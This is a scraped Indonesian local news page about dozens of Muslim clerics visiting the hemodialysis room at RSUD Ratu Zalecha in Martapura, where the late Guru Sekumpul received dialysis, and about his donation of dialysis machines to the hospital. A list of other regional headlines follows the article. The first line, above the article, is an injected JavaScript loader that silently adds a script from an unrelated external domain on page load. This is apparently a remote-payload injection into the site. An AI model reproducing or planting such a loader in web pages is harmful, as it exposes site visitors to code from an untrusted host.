(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Puluhan Ulama Tiba-Tiba Kunjungi Ruang Hemodialisa RSUD Ratu Zalecha


REPORTER: Rudiyanto

 

MARTAPURA, Puluhan ulama dan tokoh agama mengunjungi RSUD Ratu Zalecha Martapura, Kamis (19/10). Mereka datang untuk melihat satu bangsal yang berada di ruang Hemodialisa. Ada apa?

Rupanya, kedatangan para ulama yang dipimpin oleh KH Abdul Muin tersebut, adalah untuk melihat langsung ruangan tempat Almarhum KH Zaini Abdul Ghani pernah menjalani perawatan rutin cuci darah. Didampingi Plt Direktur RSUD Ratu Zalecha, Dr Eko Subiyanto, para ulama dan tokoh agama ini mengenang sosok ulama kharismatik yang masyur dengan sapaan Abah Guru Sekumpul.

Dalam ruang perawatan Hemodialisa, di atas kasur yang pernah ditempati Guru Sekumpul saat menjalani perawatan cuci darah, Guru Muin menyempatkan duduk di atasnya. Beberapa yang lain, bahkan bergantian merebahkan diri di atasnya.

Menurut Guru Kaspul, pengajar pada Pondok Pesantren (Ponpes) Darussalam yang ikut mendampingi Guru Muin “napaktilas” perjalanan Guru Sekumpul di RSUD Ratu Zalecha, kedatangannya ke ruang cuci darah semata bertujuan mengambil berkah dari Guru Sekumpul sebagai seorang alim dan sholeh.

Mengambil berkah dari seorang alim, ujar Guru Kaspul, salah satunya dapat dilakukan dengan cara mengunjungi tempat-tempat dimana dahulu seorang alim ulama itu pernah berdiam. Karena dalam Islam sendiri diajarkan demikian.

“Semisal saat Nabi Muhammad Isra Mi’raj, Nabi menyinggahi sejumlah tempat di antarnya Batlehem dan Tursina. Dan hal-hal itulah yang menjadi contoh dan kami laksanakan,” ujar Guru Kaspul.

Dan lagi, kata Guru Kaspul, berkat Almarhum Guru Sekumpul pernah dirawat dan rutin menjalani cuci darah semasa sakitnya, telah menjadi berkah bagi khalayak luas. Karena sejak itu, RSUD Ratu Zalecha memiliki layanan cuci darah hingga saat ini.

Guru Muin bersama ulama lainnya menyempatkan diri duduk di kasur tempat almarhum Guru Sekumpul pernah berbaring menjalani cuci darah. Foto: Rudiyanto

“Dulunya hanya ada satu alat cuci darah yang dibeli Guru Sekumpul khusus untuk perawatan cuci darah beliau. Namun berikutnya, satu alat lagi dibeli dan dihibahkan kepada rumah sakit untuk merawat pasien lain,” ungkap Guru Kaspul.

Senada, menurut Dr Eko Subiyanto, keberadaan pelayanan cuci darah di RSUD Ratu Zalecha tak lepas dari peran dan jasa Guru Sekumpul. Selain pernah menjalani perawatan cuci darah dengan alat yang dibeli sendiri, sebuah alat cuci darah juga dibeli dan dihibahkan ke rumah sakit.

“Dari satu unit mesin cuci darah, Beliau (Guru Sekumpul, red) menambah satu lagi unit untuk pelayanan cuci darah pasien lain. Keberadaan unit hemodialisa di Rumah Sakit Ratu Zalecaha ini bentuk dari kepedulian Beliau  terhadap umat,” ujar Eko.

Sejak itu, unit alat Hemodialisa terus ditambah demi optimalisasi pelayanan cuci darah bagi pasien gagal ginjal. Dengan 16 unit mesin cuci darah, RSUD Ratu Zalecha bahkan menjadi rujukan,dan unit hemodialisa menjadi unit unggulan yang ada untuk melayani pasien cuci darah tak hanya Kabupaten Banjar, tapi juga Banjarbaru, dan Banjarmasin. (rudiyanto)


Desy Arfianty

Recent Posts

Dua APILL Disiapkan, Atasi Kemacetan di Panglima Batur Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru menggelar ekspose pembangunan Area Traffic Control System (ATCS)… Read More

1 jam ago

Dua Bapaslon Jalur Non Partai Serahkan Syarat Dukungan ke KPU Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN – Detik-detik terakhir penutupan penyerahan syarat dukungan bakal pasangan calon (Bapaslon) Wali Kota… Read More

2 jam ago

Bupati Lepas TP PKK Banjar Wakil Kalsel ke Parade Budaya Nusantara

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur melepas peserta lomba Parade Budaya Nusantara, di… Read More

3 jam ago

Tak Ada Peminat Jalur Perseorangan di Pilwali Banjarbaru 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemilihan Wali Kota dan Wakil Wali Kota dalam kontestasi Pilkada 2024 di… Read More

3 jam ago

Kebakaran Dini Hari di Palangkaraya, Dana Hanya Bisa Selamatkan Anak Istri

KANALKALIMANTAN.COM, PALANGKARAYA - Puluhan rumah di permukiman padat penduduk Jalan Mendawai Induk, Kota Palangkaraya, Kalimantan… Read More

6 jam ago

Amuntai Expo dan Bazar UMKM 2024 Berakhir

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) melalui Asisten Perekonomian dan Pembangunan… Read More

6 jam ago

This website uses cookies.